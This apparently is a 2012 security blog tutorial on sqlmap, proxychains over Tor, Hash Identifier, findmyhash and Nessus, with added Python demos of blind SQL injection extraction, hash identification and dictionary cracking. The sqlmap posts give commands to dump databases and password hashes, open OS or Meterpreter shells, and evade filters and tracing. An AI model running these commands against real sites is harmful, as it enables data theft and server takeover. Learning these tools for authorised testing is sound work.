Saturday, November 24, 2012

Sqlmap - SQL injection part 2

If you haven't read Sqlmap - SQL injection part 1, click here.
Now let's look at some of sqlmap's advanced options.
With -o we turn on all optimization switches.
With --random-agent sqlmap sends a randomly selected HTTP User-Agent header instead of its default one, which announces itself as sqlmap and is blocked by many filters.
With --ignore-proxy we ignore the system's default HTTP proxy settings (use --ignore-proxy only when sqlmap fails because of a proxy configured in the environment).
With --level=LEVEL we change the level of tests to perform (1-5, default 1); level 2 also tests the Cookie header and level 3 the User-Agent and Referer headers.
With --risk=RISK we change the risk of the tests (1-3, default 1; older releases also accept 0); risk 2 adds heavy time-based tests and risk 3 adds OR-based tests, which can modify data if the injection point sits in an UPDATE or DELETE statement.
With --technique=TECH we choose which injection techniques to use, as a string of letters: B (boolean-based blind), E (error-based), U (UNION query), S (stacked queries), T (time-based blind) and, in current releases, Q (inline queries). The default is all of them (BEUST in the version shown here, BEUSTQ today).
We can find the database user the application connects as with: --current-user
If we add --passwords we also dump the DBMS users' password hashes: --current-user --passwords
With --dump-all we dump every table of every database (slow and very noisy; prefer -D and -T to take only what you need).
We can open an OS shell through the DBMS with --os-shell (MySQL, PostgreSQL and Microsoft SQL Server only). If we want a Meterpreter session instead, we use --os-pwn and point sqlmap at our Metasploit installation with:
--msf-path=/path/of/msf
We can route sqlmap through a local Tor proxy with: --tor (add --check-tor to make sure the traffic really leaves through Tor before you start testing).

If you have any problems or need more explanation, just write below this post!

Proxychains

Proxychains is a tool that forces the TCP connections of any program through a chain of one or more proxies. It works by preloading a library that hooks the program's socket calls, so it only covers applications that open normal TCP connections: UDP, ICMP and raw-socket traffic bypass it entirely.
For example you can run Metasploit through Tor (proxychains msfconsole), or bring up a VPN over Tor.
You can install proxychains with: sudo apt-get install proxychains
If you use Arch you can install it from the AUR.
Now edit /etc/proxychains.conf and add the proxy you want to the [ProxyList] section, for example socks5 127.0.0.1 9050 for a local Tor client. Also enable proxy_dns there, otherwise the program's DNS lookups still go out directly and reveal what you are connecting to.
Now you can use proxychains with any program, for example openvpn, nmap etc. For nmap use a TCP connect scan (-sT) together with -Pn and -n: a SYN scan (-sS) uses raw sockets and host discovery uses ICMP, and neither goes through the chain.
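A minimal /etc/proxychains.conf for the Tor setup above, added here as an example (it is not shipped with the page or with proxychains itself; 9050 is Tor's default SOCKS port):

```ini
# /etc/proxychains.conf (example)

# Chain mode: strict_chain sends every connection through all listed proxies
# in order and fails if any of them is down; dynamic_chain skips dead ones.
strict_chain

# Resolve hostnames through the proxy rather than the local resolver,
# otherwise DNS queries leak outside Tor even though the TCP data does not.
proxy_dns

# Timeouts in milliseconds; Tor circuits are slow, so keep these generous.
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# type   host        port
socks5   127.0.0.1   9050
```

With this file in place, proxychains nmap -sT -Pn -n target goes through Tor, while nmap -sS (raw sockets) and ping (ICMP) are not touched by the chain at all.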

If you have any problems or need more explanation, just write below this post!

Monday, November 19, 2012

Hash Identifier

Do you have a hash to crack (see the previous article) but don't know what kind of hash it is?
Then you can use a Python script called Hash Identifier to work out which algorithm most likely produced it.
You can download Hash Identifier from here.
Hash formats supported:
ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192
Haval-224
Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…

To run this script you need Python; change into the directory you extracted it to and type:
./Hash_ID.py
Paste the hash at the prompt and the script prints the possible hash types, most likely first. Keep in mind that it only looks at the length and the character set of the string, so a 32-character hexadecimal value is reported as MD5 but could just as well be MD4, NTLM or another 128-bit digest; use what you know about where the hash came from (the application, the database column, any prefix such as $1$ or *) to pick the right cracking mode.
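To show what Hash Identifier is doing when it answers, here is an added example (my own code, not the Hash Identifier script) that identifies the formats from the list above the same way: prefixed and structured formats first, because a prefix such as $1$ or * names the algorithm, then a fall-back on length for bare hexadecimal digests, which can only ever give a list of candidates. The sample inputs at the bottom are constructed, except md5("test"), the empty LM:NT pair and MySQL's PASSWORD('password'), which are well-known values.

```python
import re

# Fixed-length hexadecimal digests, most common interpretation first. Length
# alone cannot separate MD5 from MD4 or NTLM (all 32 hex chars), so every
# candidate for a length is returned and the caller decides using context.
HEX_BY_LENGTH = {
    8:   ["CRC-32", "ADLER-32", "CRC-32B"],
    16:  ["MySQL (pre-4.1)", "MD5(Half)", "MD5(Middle)"],
    32:  ["MD5", "MD4", "NTLM", "Domain Cached Credentials", "RipeMD-128", "Haval-128", "MD2"],
    40:  ["SHA-1", "RipeMD-160", "MySQL5 - SHA-1(SHA-1($pass))", "Tiger-160", "Haval-160"],
    48:  ["Tiger-192", "Haval-192"],
    56:  ["SHA-224", "Haval-224"],
    64:  ["SHA-256", "RipeMD-256", "SNEFRU-256", "GOST R 34.11-94", "Haval-256"],
    80:  ["RipeMD-320"],
    96:  ["SHA-384"],
    128: ["SHA-512", "Whirlpool"],
}

# Formats whose prefix or layout names the algorithm (and usually carries a
# salt). Checked first, because a prefix is far stronger evidence than a length.
PREFIXED = [
    (r"^\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}$",                    "MD5(Unix)"),
    (r"^\$apr1\$[^$]{1,8}\$[./0-9A-Za-z]{22}$",                 "MD5(APR)"),
    (r"^\$5\$(rounds=\d+\$)?[^$]{1,16}\$[./0-9A-Za-z]{43}$",    "SHA-256(Unix)"),
    (r"^\$6\$(rounds=\d+\$)?[^$]{1,16}\$[./0-9A-Za-z]{86}$",    "SHA-512(Unix)"),
    (r"^\$P\$[./0-9A-Za-z]{31}$",                               "MD5(Wordpress)"),
    (r"^\$H\$[./0-9A-Za-z]{31}$",                               "MD5(phpBB3)"),
    (r"^\*[0-9A-Fa-f]{40}$",                                    "MySQL5 - SHA-1(SHA-1($pass))"),
    (r"^[0-9A-Fa-f]{32}:[0-9A-Fa-f]{32}$",                      "SAM - (LM_hash:NT_hash)"),
    (r"^[0-9a-f]{32}:[0-9A-Za-z]{16}$",                         "md5($pass.$salt) - Joomla"),
    (r"^sha1\$[^$]*\$[0-9a-f]{40}$",                            "SHA-1(Django)"),
    (r"^md5\$[^$]*\$[0-9a-f]{32}$",                             "MD5(Django)"),
    (r"^sha256\$[^$]*\$[0-9a-f]{64}$",                          "SHA-256(Django)"),
    (r"^\{MD5\}[A-Za-z0-9+/]{22}==$",                           "LDAP MD5 (Base64)"),
    (r"^\{SHA\}[A-Za-z0-9+/]{27}=$",                            "LDAP SHA-1 (Base64)"),
    (r"^[./0-9A-Za-z]{13}$",                                    "DES(Unix)"),
]
PREFIXED = [(re.compile(p), name) for p, name in PREFIXED]
HEX = re.compile(r"^[0-9A-Fa-f]+$")


def identify(value):
    """Return candidate hash types for value, most likely first; [] if unknown."""
    value = value.strip()
    for pattern, name in PREFIXED:
        if pattern.match(value):
            return [name]
    if HEX.match(value):
        return list(HEX_BY_LENGTH.get(len(value), []))
    return []


# Sample inputs: md5("test"), the empty LM:NT pair and MySQL PASSWORD('password')
# are well-known values; the others are constructed to match the formats' shapes.
SAMPLES = [
    "098f6bcd4621d373cade4e832627b4f6",
    "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
    "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",
    "$1$saltsalt$" + "c" * 22,
    "$P$B" + "a" * 8 + "b" * 22,
    "{MD5}CY9rzUYh03PK3k6DJie09g==",
    "not-a-hash",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample[:44]:<46} -> {', '.join(identify(sample)) or 'unknown'}")
```

The order inside each list is a judgement call, not a measurement: a 40-character hex value is listed as SHA-1 first simply because that is what it usually is, which is exactly the guess Hash Identifier makes too.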

If you have any problems or need more explanation, just write below this post!

Saturday, November 10, 2012

Sqlmap - SQL injection part 1

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Its main features:
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
-Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
-Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
-Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

You can download sqlmap from here
After downloading, extract sqlmap and change into its directory (cd sqlmap).
To run sqlmap you need Python 2.6 or 2.7 (current releases also run on Python 3); you can download Python from the official website.
For more info about sqlmap click here

START


First we need a URL to analyze, for example www.website.com/pag.php?id=4 (a parameter that comes from the user and ends up inside a query).
Now we can test this URL with sqlmap (keep the URL in quotes so that the shell does not interpret ? and &):
./sqlmap.py -u "www.website.com/pag.php?id=4"
sqlmap tries each injection technique against every parameter (here only id) and reports which one is injectable, the DBMS it fingerprinted and the payload that worked. The result is saved in a session file, so the commands below reuse it instead of testing again.
If the parameter is injectable we can list the databases by adding --dbs:
./sqlmap.py -u "www.website.com/pag.php?id=4" --dbs
Then we can list the tables contained in one database by selecting it with -D (a name from the --dbs output) and adding --tables:
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --tables
Then we can list the columns contained in one table by selecting it with -T and adding --columns:
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --columns
Now if you are interested in the contents you can dump the table with --dump (add -C col1,col2 to take only the columns you need):
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --dump (dumps all tables in the database)
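To see what sqlmap does behind those commands, here is an added example (my own code, not sqlmap's) that replays a boolean-based blind injection against a constructed in-memory SQLite database standing in for the site's backend. It shows the vulnerable query behind pag.php?id=4, the 1=1 / 1=2 check sqlmap runs on the parameter, and the character-by-character extraction that --dbs, --tables and --dump are built on, next to the parameterised query that stops it. SQLite's substr and unicode functions are assumed here; against MySQL sqlmap uses MID and ORD, but the idea is the same.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO pages VALUES (4, 'Contact page');
        CREATE TABLE users(name TEXT, pass TEXT);
        INSERT INTO users VALUES ('admin', 'secret');
    """)
    return conn


def vulnerable_page(conn, id_param):
    """pag.php?id=... done the wrong way: the raw parameter is pasted into SQL."""
    sql = "SELECT title FROM pages WHERE id=" + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "error"          # stands in for the 500 page a real app would show
    return row[0] if row else "not found"


def safe_page(conn, id_param):
    """The fix: a bound parameter is data, so it can never become part of the query."""
    row = conn.execute("SELECT title FROM pages WHERE id=?", (id_param,)).fetchone()
    return row[0] if row else "not found"


class Target:
    """Wraps a page function and counts requests, as sqlmap reports them."""
    def __init__(self, page):
        self.page, self.requests = page, 0

    def get(self, id_value):
        self.requests += 1
        return self.page(id_value)


def is_boolean_injectable(target, base="4"):
    """sqlmap's boolean-based blind test on the id parameter: an always-true
    condition must leave the page as it was, an always-false one must change it."""
    original = target.get(base)
    as_true = target.get(base + " AND 1=1")
    as_false = target.get(base + " AND 1=2")
    return original == as_true and as_true != as_false


def extract(target, subquery, base="4", max_len=32):
    """Read the single-value result of subquery one character at a time, each
    found by a binary search on its ASCII code (7 requests per character)."""
    truth = target.get(base)
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # ifnull(..., 0) turns "past the end of the value" into code 0
            cond = f"ifnull(unicode(substr(({subquery}),{pos},1)),0)>{mid}"
            if target.get(f"{base} AND {cond}") == truth:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:             # no character at this position: end of value
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    conn = make_db()
    vuln = Target(lambda v: vulnerable_page(conn, v))
    print("vulnerable page injectable:", is_boolean_injectable(vuln))
    secret = extract(vuln, "SELECT pass FROM users WHERE name='admin'")
    print(f"extracted {secret!r} in {vuln.requests} requests")
    safe = Target(lambda v: safe_page(conn, v))
    print("parameterised page injectable:", is_boolean_injectable(safe))
```

Each character costs seven requests, so pulling a six-character value takes about fifty; multiply that by every column of every row and you see why --dump-all is so noisy, and why sqlmap prefers UNION or error-based techniques whenever the page allows them.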

If you have any problems or need more explanation, just write below this post!

Thursday, November 8, 2012

Findmyhash - Crack hash

Findmyhash is a Python script that cracks hashes by submitting them to online cracking services and hash databases; it does not do any computation itself, so the hashes you feed it leave your machine.
You can download this script from here
Findmyhash supports :
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords (a reversible obfuscation, not a hash: these are decoded, not cracked)
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded

OPTIONS
-h hash_value: if you only want to crack one hash, specify its value with this option. (python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6")
-f file: if you have several hashes, you can specify a file with one hash per line. (python findmyhash.py MYSQL -f mysqlhashesfile.txt)
-g: if your hash cannot be cracked, search for it in Google and show all the results.
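Findmyhash asks online services; as an added example (my own code, not findmyhash's) here is the offline equivalent for the formats above that Python's hashlib covers: a dictionary attack over a constructed wordlist, handling both the -h (single hash) and -f (one hash per line) cases, plus a decoder for Cisco type 7, which sits in the list beside the hashes but is a fixed-key XOR and needs no wordlist at all. Format names follow findmyhash's spelling. LM and NTLM are left out because they need DES and MD4, which hashlib does not reliably provide.

```python
import base64
import hashlib

# Constructed stand-in for a wordlist file (one candidate per line in real use).
WORDLIST = ["123456", "password", "qwerty", "letmein", "test", "admin"]


def mysql5(p):
    """MySQL 4.1+ PASSWORD(): '*' followed by upper-case hex of SHA1(SHA1(p))."""
    return "*" + hashlib.sha1(hashlib.sha1(p.encode()).digest()).hexdigest().upper()


def ldap(algo, tag):
    """LDAP userPassword style: {TAG} followed by the Base64 of the raw digest."""
    return lambda p: tag + base64.b64encode(hashlib.new(algo, p.encode()).digest()).decode()


# findmyhash format name -> function producing the stored string for a password
FORMATS = {
    "MD5":       lambda p: hashlib.md5(p.encode()).hexdigest(),
    "SHA1":      lambda p: hashlib.sha1(p.encode()).hexdigest(),
    "SHA256":    lambda p: hashlib.sha256(p.encode()).hexdigest(),
    "SHA512":    lambda p: hashlib.sha512(p.encode()).hexdigest(),
    "MYSQL":     mysql5,
    "LDAP_MD5":  ldap("md5", "{MD5}"),
    "LDAP_SHA1": ldap("sha1", "{SHA}"),
}
# Hex digests compare case-insensitively; the Base64 forms are case-sensitive.
CASE_INSENSITIVE = {"MD5", "SHA1", "SHA256", "SHA512", "MYSQL"}


def crack(fmt, target, wordlist=WORDLIST):
    """Return the first word in wordlist whose fmt hash equals target, else None."""
    make = FORMATS[fmt]
    target = target.strip()
    if fmt in CASE_INSENSITIVE:
        target = target.lower()
    for word in wordlist:
        candidate = make(word)
        if fmt in CASE_INSENSITIVE:
            candidate = candidate.lower()
        if candidate == target:
            return word
    return None


def crack_file(fmt, lines, wordlist=WORDLIST):
    """The -f behaviour: one hash per line, blank lines ignored."""
    return {line.strip(): crack(fmt, line, wordlist) for line in lines if line.strip()}


# Cisco IOS type 7 is not a hash: every byte is XORed with a character of this
# fixed, public table, starting at the offset given by the first two digits.
_XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def cisco7_decode(s):
    """Recover the plaintext of a type 7 string such as 060506324F41."""
    s = s.strip()
    seed = int(s[:2])
    data = bytes.fromhex(s[2:])
    return "".join(chr(b ^ _XLAT[(seed + i) % len(_XLAT)]) for i, b in enumerate(data))


if __name__ == "__main__":
    # md5("test") is the hash used in the -h example above
    print(crack("MD5", "098f6bcd4621d373cade4e832627b4f6"))
    print(crack_file("SHA1", ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8\n", "\n"]))
    print(cisco7_decode("060506324F41"))
```

Note what is missing from FORMATS: nothing salted. For $1$, $6$, WordPress or Joomla hashes the salt has to be parsed out and fed into the right KDF, and plain lookups in online databases (the whole point of findmyhash) do not work for them at all.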
FOR MORE INFO VISIT : http://code.google.com/p/findmyhash/
If you want to know what kind of hash yours is, check this article.
If you have any problems or need more explanation, just write below this post!

Thursday, November 1, 2012

Nessus - Server Scan

Nessus is a proprietary vulnerability scanner.
It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.
You can download nessus from official website, click here
Now you must obtain an activation code from here.
Now you must activate your code (this also downloads the plugin feed, so it takes a while):
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
Now you can start the Nessus daemon:
Move into the directory /opt/nessus/sbin and run
sudo ./nessusd
Now we must add a user (choose a strong password, this account drives the whole scanner):
sudo /opt/nessus/sbin/nessus-adduser
Now we can use Nessus! Open a browser and go to: https://localhost:8834
The certificate is self-signed, so the browser will warn you; that is expected for a local install.

If you have any problems or need more explanation, just write below this post!